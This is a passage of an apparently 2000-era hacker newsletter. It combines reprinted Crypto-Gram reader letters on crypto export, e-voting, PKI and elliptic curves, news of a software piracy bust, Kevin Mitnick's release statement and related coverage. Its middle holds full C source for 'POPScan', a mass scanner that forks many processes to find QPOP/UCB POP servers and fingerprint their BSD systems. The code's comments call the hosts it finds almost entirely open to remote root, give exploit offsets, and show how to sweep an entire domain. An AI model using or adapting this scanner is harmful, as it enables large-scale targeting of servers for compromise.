of the world.
I work in the finance industry in Europe -- Zurich, to be precise -- and
have some involvement with security. This industry (a) WILL NOT use U.S.
crypto products, and (b) will certainly NOT make any long-term plans or
partnerships to do so for U.S. products with consumer content, because (a)
the products to date are forced by law to be weak, but more important, (b)
the U.S. government can't be trusted. Even if it approved today the export
of some products based on strong crypto, everyone knows that this
permission could be terminated tomorrow for the same or other products.
And everyone also suspects strongly that the U.S. government will in any
case force providers to put trap doors into their products.
Under the circumstances, the European finance and e-business industries
would be have to be crazy to use U.S. crypto-based products. And they're
not crazy.
To play in this business in the rest of the world, the U.S. will have to
have a clear, consistent, and favorable policy, and U.S. companies will
have to present products that are demonstrably strong with no trap doors.
(I invite you to speculate if this will happen before Hell freezes over.)
In the meantime, there are plenty of non-U.S. products to choose from, and
banks like UBS, Credit Suisse, Grupo Intesa, Societe General, Deutsche
Bank, Generale Bank, Bank Austria, and Barclays are not sitting back
anxiously waiting for U.S. products to become available. They're doing
business with non-U.S. products that are just fine, thank you.
From: "Grawrock, David" <david.grawrock@intel.com>
Subject: Electronic voting
All these comments regarding electronic voting and absentee voting are
missing the mark. The State of Oregon has that all elections (except
presidential) are done by mail. It's like the entire state is voting absentee.
The process is actually pretty painless. You receive your voter pamphlet
and then you get your ballot. It has to be in by election day. If you
miss the excitement of going to the voting booth there are collection
points where you can drop off your filled in ballot. It's really not that
hard.
The point here is that the state has determined that it is easier (and
cheaper) to simply process the entire election via the absentee process.
It now becomes a simple step to go from by mail to by electronic voting.
All of the arguments regarding coercion must already have been answered
(the government always thinks a process through completely). We have
elected all sorts of politicians without anyone coming back and reporting
problems with coercion.
From: Gerry Brown <gerry@liberate.com>
Subject: RE: Absentee Ballots
I just checked some figures with a friend who has the data on Absentee
Ballots for San Mateo County in California and he has compared it with the
San Francisco elections held this week.
The percentage of registered voters using absentee ballots is about
13%-15%. But the more astonishing is the fact that 35%-50% of those
actually voting are done by absentee ballots. The lower figure is for
national elections and the higher side corresponds to local elections.
From: "Hillis, Brad" <BradH@DIS.WA.GOV>
Subject: PKI article--agree and disagree
I can't begin to tell you how much I enjoyed your article with Carl
Ellison, "Ten Risks of PKI: What You're not Being Told about Public Key."
I'm the lead ecommerce attorney for the state of Washington, and we are
currently procuring a private PKI vendor to provide digital signatures for
state and local government, similar to the federal government ACES procurement.
What you say that PKI is not needed for ecommerce to flourish is true.
It's a thought I keep having at all the digital signature law presentations
I attend, and the theme I had planned to discuss at my March 7 talk in
Boston on PKI. One has to keep asking oneself, why do I need a digital
signature? What is the opportunity cost of setting up a PKI? (That is,
what security improvements could I make if I spent the money on something
besides PKI).
However, I disagree with this statement in your article:
"In other words, under some digital signature laws (e.g., Utah and
Washington), if your signing key has been certified by an approved CA, then
you are responsible for whatever that private key does. It does not matter
who was at the computer keyboard or what virus did the signing; you are
legally responsible."
The law seems to say that at first reading, but my view of the law is that
it sets up a "rebuttable presumption" of non-repudiation. This is the same
rule that applies to physical, pen and ink signatures. Your statement
reflects the views of some proponents of PKI who overstate the legal force
of a "licensed digital signature" under Washington law. But if, in fact, I
never applied my digital signature to a document, and I can prove it (e.g.,
I have an alibi), then I would not be legally responsible. I believe that
is the situation in non-PKI electronic signature schemes, where a (paper
and manually signed) Electronic Data Interchange Agreement or Trading
Partner Agreement will state that all data submitted between the parties
carries the same legal force as if it was manually signed.
Having found flaws in the PKI-style laws of Washington, Utah and Minnesota,
I do not find a great deal of higher or practical intelligence in the more
popular electronic signature laws, either. Esignature laws have not proven
any more important to ecommerce than PKI digital signature laws, so why are
we in such a rush to pass UETA (uniform electronic transaction act)?
From: "Carl Ellison" <cme@acm.org>
Subject: Re: PKI article--agree and disagree
You are correct. However, I believe we still need to warn against the
rebuttable presumption of non-repudiation. The keyholder may have no alibi
at all. The keyholder may not be aware that his key was misused (e.g., by
an attacker who had gained physical or network access to his computer).
This is similar to the position people were in in Britain when they were
challenging ATM card operations. It took expert witnessing by Ross
Anderson to defend some of their claims, and even then it didn't always
work. There, too, the presumption was that the cardholder performed any
operation when the ATM logs said he did -- whether he did or not. It was
up to the cardholder to prove the negative.
This gets even worse when the keyholder has his private key on a smartcard
in his possession. It's that much harder to convince a jury that you
didn't sign, if the merchant or bank can claim that the signing key never
left your personal possession. When an attacker has network access to your
computer, he doesn't leave a trail. You have no audit record showing the
attack. It's your word against the merchant's and you have no evidence to
offer on your behalf. You can't even accuse anyone else. You have no idea
who to accuse.
Meanwhile, your account has been debited until you manage to prove your
point (against the presumption that you're lying). When you compare this
to credit card purchases, it's radically different. With a credit card,
you have not spent anything until you write the check to the credit card
company. When or before you write that check, you can challenge a line
item and force the merchant to prove that you were in fact the purchaser.
At least with my AMEX account, the immediate result is that AMEX removes
the item from my statement -- to be reinstated if the merchant is able to
prove that I did do the purchase. I have had such challenges go my way
once and the other times, I had simply forgotten. In one case, I thought I
was being double-billed, but it turns out I had never been billed the first
time (many months before).
From: Alfred John Menezes <ajmeneze@cacr.math.uwaterloo.ca>
Subject: Elliptic Curve Cryptosystems
I read with interest your recent article on ECC in the November 15 issue of
Crypto-Gram. I agree with most of your statements and comments.
Your recommendations were:
1) If you're working in a constrained environment where longer keys just
won't fit, consider elliptic curves.
2) If the choice is elliptic curves or no public-key algorithms at all,
use elliptic curves.
3) If you don't have performance constraints, use RSA.
4) If you are concerned about security over the decades (and almost no
systems are), use RSA.
I certainly agree with recommendations 1) and 2) -- ECC certainly cannot be
worse than no security at all!
Regarding recommendation 3), I think that most environments which call for
public-key solutions will have *some* performance constraints. The
limiting factor could be an over-burdened web server which needs to sign
thousands of outgoing messages per minute, a handheld device which is
communicating with a PC, etc. In such scenarios, one should select the
public-key method that performs the best in the most constrained
environment. If the constraints involve key sizes, bandwidth, power
consumption, or speed (for private key operations), then ECC is likely the
method of choice over RSA.
Finally, I feel that your recommendation that RSA should be used (instead
of ECC) in situations where you are concerned with long-term security is a
bit unfair. After all, as you state in the postscript to your article, all
the analysis you used on the elliptic curve discrete logarithm problem also
applies to the integer factorization problem. I propose that applications
which do require long-term security should consider using both* RSA and ECC
-- by double encrypting a message with RSA and ECC, or by signing a message
twice with RSA and ECC.
The following are my condensed thoughts on the security and efficiencies of
ECC as compared with RSA. They should be considered a supplement to your
Crypto-Gram article, and not a replacement of it.
http://www.cacr.math.uwaterloo.ca/~ajmeneze/misc/cryptogram-article.html
((This is a good essay, but remember the author's bias. He works for
Certicom, and it is in his financial interest for you to believe in
elliptic curves. --Bruce))
** *** ***** ******* *********
** *************
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on computer security and cryptography.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
Please feel free to forward CRYPTO-GRAM to colleagues and friends who will
find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as
it is reprinted in its entirety.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is founder and CTO of
Counterpane Internet Security Inc., the author of "Applied Cryptography,"
and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served
on the board of the International Association for Cryptologic Research,
EPIC, and VTW. He is a frequent writer and lecturer on computer security
and cryptography.
Counterpane Internet Security, Inc. is a venture-funded company bringing
innovative managed security solutions to the enterprise.
http://www.counterpane.com/
Copyright (c) 2000 by Bruce Schneier
ISN is sponsored by Security-Focus.COM
@HWA
20.0 POPS.C qpop vulnerability scanner by Duro
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* POPScan QPOP/UCB/SCO scanner by duro
duro@dorx.net
takes list of ip's from stdin
The hosts gathered by this scanner are
almost 100% vulnerable to a remote
root attack. The exploits used to root
the vulnerable machines can all be found by
searching bugtraq. UCB pop is 100% of the
time vulnerable to the qpop exploit (it's a very
old version of qpop). The QPOP version is
filitered to make sure that non-vulnerable
versions do not show up in the scan.
Common offsets for the bsd qpop exploit are:
621, 1500, 500, 300, 900, 0
Example usage:
./z0ne -o ac.uk | ./pops > ac.uk.log &
would scan ac.uk for vulnerabilities.
much help from jsbach
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <signal.h>
int ADMtelnet (u_long, int port);
char domain[50];
int NUMCHILDREN = 150, currchilds = 0; /* change numchildren to taste */
char ip[16];
int temp1 = 0;
void scan(char *ip);
void alrm(void) { return; }
main()
{
while( (fgets(ip, sizeof(ip), stdin)) != NULL)
switch(fork()) {
case 0: {
scan(ip); exit(0);
}
case -1: {
printf("cannot fork so many timez@!@^&\n");
exit(0);
break;
}
default:
{
currchilds++;
if (currchilds > NUMCHILDREN)
wait(NULL);
break;
}
}
}
void scan(char *ip)
{
char printip[16];
struct sockaddr_in addr;
int sockfd;
char buf[512];
bzero((struct sockaddr_in *)&addr, sizeof(addr));
sockfd = socket(AF_INET, SOCK_STREAM, 0);
addr.sin_addr.s_addr = inet_addr(ip);
addr.sin_port = htons(110);
addr.sin_family = AF_INET;
signal(SIGALRM, alrm);
alarm(5);
if ( (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) != -1))
{
recv(sockfd, (char *)buf, sizeof(buf), 0);
if ( (strstr(buf, "QPOP") ) != NULL && (strstr(buf, "2.5")) == NULL && (strstr(buf, "krb")) == NULL)
{
checkos(ip,1);
}
if((strstr(buf, "UCB")) != NULL)
checkos(ip,2);
if((strstr(buf, "SCO")) != NULL)
{
strcpy(printip, ip);
if ((temp1=strrchr(printip, '\n')) != NULL)
bzero(temp1, 1);
printf("%s: SCO Unix box running SCO pop.\n",printip);
}
}
return;
}
// }
checkos(char *ip, int spl)
{
int temp2;
char printip[16];
unsigned long temp;
temp = inet_addr(ip);
temp2 = ADMtelnet(temp, 23);
strcpy(printip, ip);
if ((temp1=strrchr(printip, '\n')) != NULL)
bzero(temp1, 1);
if ((temp2 == 1)&&(spl==1))
printf("%s: OpenBSD box running vuln QPOP\n",printip);
if ((temp2 == 1)&&(spl==2))
printf("%s: OpenBSD box running vuln UCB pop\n",printip);
if ((temp2 == 2)&&(spl==1))
printf("%s: FreeBSD box running vuln QPOP\n",printip);
if ((temp2 == 2)&&(spl==2))
printf("%s: FreeBSD box running vuln UCB pop\n",printip);
if ((temp2 == 3)&&(spl==1))
printf("%s: BSDi box running vuln QPOP\n",printip);
if ((temp2 == 3)&&(spl==2))
printf("%s: BSDi box running vuln UCB pop\n",printip);
}
int ADMtelnet (u_long ip, int port)
{
struct sockaddr_in sin;
u_char buf[4000];
int dasock, len;
int longueur = sizeof (struct sockaddr_in);
dasock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); /* gimme a socket */
sin.sin_family = AF_INET;
sin.sin_port = htons (port);
sin.sin_addr.s_addr = ip;
if (connect (dasock, (struct sockaddr *) &sin, longueur) == -1)
return (-1);
while (1)
{
memset (buf, 0, sizeof (buf));
if ((len = read (dasock, buf, 1)) <= 0)
break;
if (*buf == (unsigned int) 255)
{
read (dasock, (buf + 1), 2);
if (*(buf + 1) == (unsigned int) 253 && !(u_char) * (buf + 2));
else if ((u_char) * (buf + 1) == (unsigned int) 253)
{
*(buf + 1) = 252;
write (dasock, buf, 3);
}
}
else
{
if (*buf != 0)
{
bzero (buf, sizeof (buf));
read (dasock, buf, sizeof (buf));
usleep(40000);
if((strstr(buf, "OpenBSD") != NULL))
return 1;
if((strstr(buf, "FreeBSD") != NULL))
return 2;
if((strstr(buf, "BSDI") != NULL))
return 3;
sleep (1);
}
}
}
return 0;
}
@HWA
21,0 Hackunlimited special birthday free-cdrom offer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by noose
http://www.hackunlimited.com/
Would you want to have all the files in Hackunlimited.com in CD, for free
of fcourse ?
Just send mailto noose@hackunlimited.com The message itself can be empty,
just put the Subject to "Free CD" and you are part of our "lottery" :).
You have time until 13th of February to send the message. 3 people will
win the CD. The winners will be announced at 22th of February.
The CD will include all files at http://www.hackunlimited.com + all the
files in http://www.hackunlimited.com/raz0r
The file list is available here:
http://www.hackunlimited.com/cdlist.txt
@HWA
22.0 HACK MY SYSTEM! I DARE YA!
~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.securiteam.com/securitynews/_Can_you_break_into_my_system__I_dare_you__.html
Title "Can you break into my system? I dare you!"
Summary
We in Beyond Security believe that the only way to test your security is
by trying to break it. But we're not as drastic as one Linux system
administrator who took this one step further - he is asking attackers to
try and break into a server he is administrating.
Details
Many administrators have to deal with potentially malicious users having
legal accounts on their servers. Universities, ISPs and large companies
have to consider the risk that local users, having access to the system as
valid users, will sometime try to elevate their privileges. The
system administrator of zeus-olympus.yi.org assumes that some of his users
are 'evil'. Although he is confident that his Linux system is secured, he
would like others to do their best to attack his system. He therefore
provided two user accounts that have normal user access to the system, and
he allows anyone who wishes to use those accounts and gain entry to the
server. Once logged in, the users are free to try and compromise the
system's security, with no strings attached. The only 'catch' is that once
vulnerability is found, it should be reported immediately, so that the
hole can be closed. This offer is extremely unique. There have been
'hacking' contests in the past (usually by commercial companies trying to
show that their product is secure), but this is one of the first time that
an administrator is offering full access to the machine (using a valid
user account) - which of course makes this game much more interesting.
Therefore, if you would like to try and break a Linux Redhat machine, join
this war game and give it your best shot.
Additional information
To join the contest, visit http://zeus-olympus.yi.org/ and enter the
'password required' section. The login is: war and the password is game.
Upon entering this section, you will receive the account information
needed to log into the server.
Feel free to give Danny some feedback about his war game: dannyw@mediaone.net.
@HWA
23.0 PWA lead member busted by the FBI
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by TRDonJuan
http://www.suntimes.com/output/news/ware04.html
Software pirating ring cracked by local
FBI
February 4, 2000
BY LORRAINE FORTE STAFF REPORTER
Chicago FBI agents say they have broken up a worldwide ring of software
thieves--called the "Pirates with Attitude"--who were distributing thousands of
programs, including the yet-unreleased Windows 2000.
A tip from an informant in Chicago led to the breakup of "one of the most sophisticated
and longest-standing" piracy and hacking rings, according to a complaint filed Thursday
in federal court in Chicago.
The FBI used the informant's access codes to break into the group's Web site and
obtain a roster of the suspects.
Robin Rothberg was arrested Thursday at his home in New Chelmsford, Mass., near
Boston. Federal officials say he was a founder and key member of the ring, which
evaded law enforcement for eight years. He is charged with conspiring to infringe
copyright.
Three days before Christmas, Rothberg somehow got a copy of Windows 2000--the
latest update of the operating system, scheduled to go on sale next month--and
uploaded it to the Internet, according to the criminal complaint.
Rothberg, an employee of NEC Technologies, accessed the group's Internet site
through a Zenith Data Systems computer server in Buffalo Grove, the complaint
states. At least two other users allegedly pirated and distributed software through
servers in Chicago, at MegsInet Inc. on West Ohio and at Computer Engineers Inc. on
North Wacker.
Members of the group downloaded software in exchange for uploading other
programs, said Assistant U.S. Attorney Lisa Griffin. They might then give away or sell
that software.
"It was a barter system, with the upshot being that the site itself contained an
incredible amount of software," Griffin said.
FBI spokesman Ross Rice said the investigation is continuing. Authorities do not yet
know the size of the pirating ring, or the monetary value of the thousands of stolen
software titles allegedly distributed from the group's WAREZ site, called Sentinel.
WAREZ is a term for an Internet site that distributes pirated versions of software. The
Sentinel site was launched in April 1996 and was set up so that only authorized users
could access it; it was not available to the general public.
The group's members were "carefully screened to minimize the risk of detection" and
were given specific roles, such as "crackers," who stripped away the copy protection
often embedded in commercial software; "couriers," who transferred large volumes of
software files from other pirating sites, and "suppliers," who brought in programs from
major software companies.
Rothberg, according to the complaint, stole at least nine other major Microsoft
programs between June and October 1999. Microsoft did not respond Thursday to
requests to comment on the case.
An industry group, the Business Software Alliance, has said software theft costs
33,000 jobs and $11 billion a year.
-=-
http://www.bostonherald.com/bostonherald/lonw/comp02042000.htm
FBI nabs Chelmsford man in software piracy ring
by Andrea Estes
Friday, February 4, 2000
Federal officials say they've captured a leader of a worldwide band of
e-pirates who surf the cyberseas in search of software plunder.
Robin Rothberg, 32, of Chelmsford, is a founding member of Pirates
with Attitudes, an international crew that steals popular titles from
powerful companies and gives them away to its members for free, the
FBI says.
The group, snared by FBI agents in Chicago, is sophisticated and
devious enough to have sought after software before it hits the
shelves, authorities said.
In December, FBI agents found Windows 2000 - which still hasn't
been released - and Office 2000 premium, a program given to select
customers for testing purposes.
In all, agents found enough software to fill the memory of 1,200
average-sized personal computer hard drives.
Rothberg, who until last week was a notebook software engineer for
NEC Computer Services in Acton, was arrested yesterday and
charged with conspiracy in U.S. District Court in Boston. Wearing a
long ponytail and black leather jacket, he pleaded not guilty and was
released without bail.
According to an FBI affidavit, Pirates with Attitudes is a highly
structured organization with different members assigned different
tasks.
``Suppliers'' steal the programs from major software companies.
``Couriers'' deliver the files to PWA and ``crackers'' strip away the
security codes that prevent piracy.
The group, overseen by a council, screens members to ``minimize the
risk of detection by authorities,'' according to an affidavit filed by FBI
Special Agent Michael Snyder of Chicago.
Rothberg, who is alleged to be a member of the council, was arrested
after an informant helped steer Snyder, an MBA and computer expert,
through its maze-like system.
Agents located PWA's internet site, ``Sentinel,'' which is accessible
only to authorized users.
``Members maintain access to PWA's site by providing files, including
copyrighted software files obtained from other sources, and in turn
are permitted to copy files provided by other users,'' wrote Snyder.
``Using the confidential informant's access codes, FBI agents logged
onto Sentinel and viewed a directory listing thousands of copyrighted
software titles available for downloading by PWA members,'' he wrote.
So far only Rothberg has been arrested. Chicago authorities
yesterday said the investigation is continuing.
``In the simplest terms, it's an organization that allowed its members
to upload software to a site configured so it could store a substantial
amount of software,'' said assistant United States Attorney Lisa
Griffin. ``They could then download it into their own computers.''
Members give and take what they wish, officials said.
``It's a two-way street,'' said Randy Sanborn, spokesman for the
United States Attorney's Office in the Northern District of Illinois.
Officials wouldn't say whether members have to pay anything - such
as a membership fee - for the service.
Rothberg was downsized out of his job last week when the division he
worked for ceased to exist, according to an NEC spokeswoman, who
said the company has no plans to investigate Rothberg's job
performance.
Rothberg asked Magistrate Judge Robert Collings for permission to
travel to California today for a job interview.
And Rothberg said he had several more planned, his attorney Joseph
Savage told Collings.
Collings ordered him to stay off his computer except to look for a job,
let the FBI spot check his e-mail, and get the court's permission if he
wants to travel outside the Bay State.
@HWA
24.0 Mitnick's Release Statement
~~~~~~~~~~~~~~~~~~~~~~~~~~~
I debated wether or not to include this in this issue since the news is
saturated with Mitnick stories right now (at least they're taking notice)
and decided it was valid to include it here in our archives. There are
many more articles available on Mitnick, so i've just included his release
statement.
Check out the sites
http://www.freekevin.com/ or http://www.2600.com/ for more info
Mitnick's Release Statement:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
January 21, 2000
Kevin Mitnick read the statement shown below upon his release from federal custody in Lompoc, California
after nearly 5 years behind bars.
Mr. Mitnick is the copyright holder of this statement, and hereby gives permission for limited reuse and
republication under the Fair Use doctrine of U.S. Copyright Law. All other rights reserved.
Good morning.
Thank you all for taking the time to come out to Lompoc today, my first day of freedom in nearly
five years. I have a brief statement to read, and I ask that you permit me to read my statement
without interruption.
First, I'd like to thank the millions of people who have visited the website kevinmitnick.com during
my incarceration, and who took the time to show their support for me during the past five years. I
relied on their support during the five years I've been incarcerated more than they will ever realize,
and I want to thank them all from the bottom of my heart.
As many of you know, I've maintained virtually complete silence during my incarceration -- I've
refused dozens of requests for interviews from news organizations from around the world, and for
very real reasons -- my actions and my life have been manipulated and grossly misrepresented by
the media since I was 17, when the Los Angeles Times first violated the custom, if not the law, that
prohibits publication of the names of juveniles accused of crimes.
The issues involved in my case are far from over, and will continue to affect everyone in this society
as the power of the media to define the "villain of the month" continues to increase.
You see, my case is about the power of the media to define the playing field, as well as the tilt of
that playing field -- it's about the power of the media to define the boundaries of "acceptable
discussion" on any particular issue or story.
My case is about the extraordinary breach of journalistic ethics as demonstrated by one man, John
Markoff, who is a reporter for one of the most powerful media organizations in the world, the New
York Times.
My case is about the extraordinary actions of Assistant U.S. Attorneys David Schindler and
Christopher Painter to obstruct my ability to defend myself at every turn.
And, most importantly, my case is about the extraordinary favoritism and deference shown by the
federal courts toward federal prosecutors who were determined to win at any cost, and who went as
far as holding me in solitary confinement to coerce me into waiving my fundamental Constitutional
rights. If we can't depend on the courts to hold prosecutors in check, then whom can we depend on?
I've never met Mr. Markoff, and yet Mr. Markoff has literally become a millionaire by virtue of his
libelous and defamatory reporting -- and I use the word "reporting" in quotes -- Mr. Markoff has
become a millionaire by virtue of his libelous and defamatory reporting about me in the New York
Times and in his 1991 book "Cyberpunk."
On July 4th, 1994, an article written by Mr. Markoff was published on the front page of the New
York Times, above the fold. Included in that article were as many as 60 -- sixty! -- unsourced
allegations about me that were stated as fact, and that even a minimal process of fact-checking
would have revealed as being untrue or unproven.
In that single libelous and defamatory article, Mr. Markoff labeled me, without justification, reason,
or supporting evidence, as "cyberspace's most wanted," and as "one of the nation's most wanted
computer criminals."
In that defamatory article, Mr. Markoff falsely claimed that I had wiretapped the FBI -- I hadn't --
that I had broken into the computers at NORAD -- which aren't even connected to any network on
the outside -- and that I was a computer "vandal," despite the fact that I never damaged any
computer I've ever accessed. Mr. Markoff even claimed that I was the "inspiration" for the movie
"War Games," when a simple call to the screenwriter of that movie would have revealed that he had
never heard of me when he wrote his script.
In yet another breach of journalistic ethics, Mr. Markoff failed to disclose in that article -- and in all
of his following articles about me -- that we had a pre-existing relationship, by virtue of Mr.
Markoff's authorship of the book "Cyberpunk." Mr. Markoff also failed to disclose in any of his
articles about this case his pre-existing relationship with Tsutomu Shimomura, by virtue of his
personal friendship with Mr. Shimomura for years prior to the July 4, 1994 article Mr. Markoff wrote
about me.
Last but certainly not least, Mr. Markoff and Mr. Shimomura both participated as de facto
government agents in my arrest, in violation of both federal law and jounalistic ethics. They were
both present when three blank warrants were used in an illegal search of my residence and my
arrest, and yet neither of them spoke out against the illegal search and illegal arrest.
Despite Mr. Markoff's outrageous and libelous descriptions of me, my crimes were simple crimes of
trespass. I've acknowledged since my arrest in February 1995 that the actions I took were illegal,
and that I committed invasions of privacy -- I even offered to plead guilty to my crimes soon after
my arrest. But to suggest without reason or proof, as did Mr. Markoff and the prosecutors in this
case, that I had committed any type of fraud whatsoever, is simply untrue, and unsupported by the
evidence.
My case is a case of curiosity -- I wanted to know as much as I could find out about how phone
networks worked, and the "ins" and "outs" of computer security. There is NO evidence in this case
whatsoever, and certainly no intent on my part at any time, to defraud anyone of anything.
Despite the absence of any intent or evidence of any scheme to defraud, prosecutors Schindler and
Painter refused to seek a reasonable plea agreement -- indeed, their first "offer" to me included the
requirement that I stipulate to a fraud of $80 million dollars, and that I agree never to disclose or
reveal the names of the companies involved in the case.
Have you ever heard of a fraud case where the prosecutors attempted to coverup the existence of
the fraud? I haven't. But that was their method throughout this case -- to manipulate the amount of
the loss in this case, to exaggerate the alleged harm, to cover up information about the companies
involved, and to solicit the companies involved in this case to provide falsified "damages" consistent
with the false reputation created by Mr. Markoff's libelous and defamatory articles about me in the
New York Times.
Prosecutors David Schindler and Christopher Painter manipulated every aspect of this case, from
my personal reputation to the ability of my defense attorney to file motions on time, and even to the
extent of filing a 1700 item exhibit list immediately before trial. It was the prosecutors' intent in this
case to obstruct justice at every turn, to use the unlimited resources of the government and the
media to crush a defendant who literally had no assets with which to mount a defense.
The fact of the matter is that I never deprived the companies involved in this case of anything. I
never committed fraud against these companies. And there is not a single piece of evidence
suggesting that I did so. If there was any evidence of fraud, do you really think the prosecutors in
this case would have offered me a plea bargain? Of course not.
But prosecutors Schindler and Painter would never have been able to violate my Constitutional rights
without the cooperation of the United States federal court system. As far as we know, I am the only
defendant in United States' history to ever be denied a bail hearing. Recently, Mr. Painter claimed
that such a hearing would have been "moot," because, in his opinion, the judge in this case would not
have granted bail.
Does that mean that the judge in this case was biased against me, and had her mind made up before
hearing relevant testimony? Or does that mean that Mr. Painter believes it is his right to determine
which Constitutional rights defendants will be permitted to have, and which rights they will be
denied?
The judge in this case consistently refused to hold the prosecutors to any sort of prosecutorial
standard whatsoever, and routinely refused to order the prosecutors to provide copies of the
evidence against me for nearly four years. For those of you who are new to this case, I was held in
pre-trial detention, without a bail hearing and without bail, for four years. During those four years, I
was never permitted to see the evidence against me, because the prosecutors obstructed our efforts
to obtain discovery, and the judge in this case refused to order them to produce the evidence against
me for that entire time. I was repeatedly coereced into waiving my right to a speedy trial because
my attorney could not prepare for trial without being able to review the evidence against me.
Please forgive me for taking up so much of your time. The issues in this case are far more important
than me, they are far more important than an unethical reporter for the New York Times, they're far
more important than the unethical prosecutors in this case, and they are more important than the
judge who refused to guarantee my Constitutional rights.
The issues in this case concern our Constitutional rights, the right of each and every one of us to be
protected from an assault by the media, and to be protected from prosecutors who believe in winning
at any cost, including the cost of violating a defendant's fundamental Constitutional rights.
What was done to me can be done to each and every one of you.
In closing, let me remind you that the United States imprisons more people than any other country on
earth.
Again, thank you for taking time out of your busy lives to come to Lompoc this morning, and thank
you all for your interest and your support.
@HWA
24.1 More submitted Mitnick articles
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributions by Zym0t1c
Hacker Mitnick released Friday
For the first time since 1995, computer criminal Kevin Mitnick is a free
man. But will he hack again?
Nearly five years after news of his arrest blazed across the nation's
headlines, hacker Kevin Mitnick walked out of a medium security prison in
Lompoc, Calif., early friday morning...
Nearly five years after news of his arrest blazed across the nation's
headlines, hacker Kevin Mitnick walked out of a medium security prison in
Lompoc, Calif., early Friday morning -- and into an uncertain future.
Read the article online at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2425165,00.html
Read the (fine but short) dutch article at:
http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4462
Since this is *big* news, you can stay here and read the ASCII-version:
Hacker Mitnick released Friday
By Kevin Poulsen, ZDNet News
UPDATED January 21, 2000 9:30 AM PT
For the first time since 1995, computer criminal Kevin Mitnick is a free
man. But will he hack again?
Nearly five years after news of his arrest blazed across the nation's
headlines, hacker Kevin Mitnick walked out of a medium security prison in
Lompoc, Calif., early friday morning...
Nearly five years after news of his arrest blazed across the nation's
headlines, hacker Kevin Mitnick walked out of a medium security prison in
Lompoc, Calif., early Friday morning -- and into an uncertain future.
The 36-year-old hacker was greeted at the gate by friends and family
members. His mother will drive him to Los Angeles, where his first order of
business will be to obtain a driver's license, report to his new probation
officer and see a doctor about injuries he suffered in a prison bus accident
last year.
"He's having neck pains, and back and shoulder pains," said Reba Vartanian,
Mitnick's grandmother. "He hasn't had a regular doctor in five years."
A free man for the first time since 1995, he will live in the Los Angeles
suburb of Westlake Village with his father, Alan Mitnick, a general
contractor.
Less clear is what Mitnick is going to do for a living. Under court order,
the hacker is banned for three years from using any kind of computer
equipment without the prior written permission of his probation officer -- a
restriction that even the court acknowledged would affect his employability.
"He's experiencing a lot of frustration over the things he can't do," said
Eric Corley, editor of the hacker magazine 2600 and the leader of a "Free
Kevin" grass-roots movement. "Keep in mind this is someone who's been kept
away from these things for five years, and when he gets out he won't even be
able to touch them."
Does incarceration cure an addict?
The restrictions, and long history of recidivism, make one former friend and
partner-in-crime pessimistic about Mitnick's future. "Do you cure a drug
addict or alcoholic by incarceration on its own?" asked Lew DePayne,
rhetorically. "Do you cure him by taking away his ability to earn a living?"
Mitnick and DePayne became friends in the late 1970s, when they were both
teenagers. Together, they explored and manipulated the telephone network as
Los Angeles' most notorious "phone phreaks." In the 1980s, DePayne seemingly
dropped out of the scene, while Mitnick moved on to corporate computers and
networks, developing a penchant for cracking systems in search of
proprietary "source code," the virtual blueprints for a computer program or
operating system.
Mitnick had already been in a series of minor skirmishes with the law when,
in 1989, he suffered his first adult felony conviction for cracking
computers at Digital Equipment Corp. and downloading source code. He served
one year in federal custody, followed by three years of supervised release.
In 1992, Mitnick was charged with a violation of his supervision for
associating with DePayne again. He went underground and online, using the
Internet to crack computers belonging to such cell phone and computer makers
as Motorola (NYSE: MOT), Fujtsu and Sun Microsystems (Nasdaq: SUNW) and to
copy more proprietary source code. The FBI captured him on Feb. 15, 1995,
when computer security expert Tsutomu Shimomura suffered an attack on his
machine and responded by tracking Mitnick to his hideout in Raleigh, N.C.
Shimomura and New York Times reporter John Markoff went on to write the
book "Takedown: The Pursuit and Capture of America's Most Wanted Computer
Outlaw -- By The Man Who Did It." Shimomura and Markoff sold the movie
rights to Miramax Films, who cast Skeet Ulrich as Mitnick. But since
shooting wrapped on the project in December 1998 the movie has languished on
the shelf with no known theatrical release date, surrounded by swirling
rumors of a direct-to-video or cable TV release. Miramax publicists didn't
return telephone inquiries about the project.
Mitnick's arrest began a series of courtroom battles over procedures and
evidence that finally ended last year in a plea agreement.
The hacker pleaded guilty in March 1999 to seven felonies and admitted to
his Internet hacking. In August 1999, Judge Marianna Pfaelzer sentenced him
to 46 months in prison, on top of an earlier 22 months sentence for the
supervision violation and cell phone cloning. With credit for his lengthy
period of pretrial custody, and some time off for good behavior, Mitnick's
served just under five years in prison.
"My sincere hope is that he gets his act together and complies with the
conditions of his supervised release and doesn't engage in further hacking
activity," said Assistant U.S. Attorney Christopher Painter, one of
Mitnick's two federal prosecutors. Painter's work on the Mitnick case helped
propel him to a position as deputy chief of the U.S. Department of Justice's
computer crime and intellectual property section in Washington, D.C. He
begins at the DOJ in March.
"I think that the significance of this case is that he was so prolific. He
not only had done this once before, but he did it on such a large scale,"
Painter said. "If past ends up being prologue, then certainly we'll go back
to court and deal with it at that time."
From hacking to ham?
Greg Vinson, one of Mitnick's defense attorneys, foresees a rosier future
for the hacker, perhaps with a job that exploits his famous ability to
"social engineer" people into doing his bidding.
"I think he's had a number of different offers to kind of do PR-type of
work," said Vinson, who also points out that Mitnick might still get a
computer job. "You have to remember the order says, 'Without the prior
express permission of the probation office.' So it's not absolutely
prohibited."
If Mitnick can't use computers, he reportedly hopes to indulge his love for
technology by returning to amateur radio, a childhood passion. Federal
Communications Commission records show that Mitnick's license expired last
